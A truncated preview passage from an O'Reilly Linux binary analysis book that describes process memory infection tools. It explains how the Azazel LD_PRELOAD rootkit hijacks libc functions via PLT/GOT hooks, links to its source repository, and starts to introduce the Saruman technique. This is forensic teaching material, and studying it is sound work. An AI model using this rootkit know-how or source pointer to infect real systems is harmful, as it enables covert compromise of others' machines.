Process memory infection
There are many rootkits, viruses, backdoors, and other tools out there that can be used to infect a system's userland memory. We will now name and describe a few of these.
Process infection tools
- Azazel: This is a simple but effective
LD_PRELOADinjection userland rootkit for Linux that is based on its predecessor rootkit named Jynx.LD_PRELOADrootkits will preload a shared object into the program that you want to infect. Typically, such a rootkit will hijack functions such as open, read, write, and so on. These hijacked functions will show up as PLT hooks (modified GOT). For more information, visit https://github.com/chokepoint/azazel. - Saruman: This is a relatively new anti-forensics infection technique that allows a user ...
Get Learning Linux Binary Analysis now with the O’Reilly learning platform.
O’Reilly members experience books, live events, courses curated by job role, and more from O’Reilly and nearly 200 top publishers.
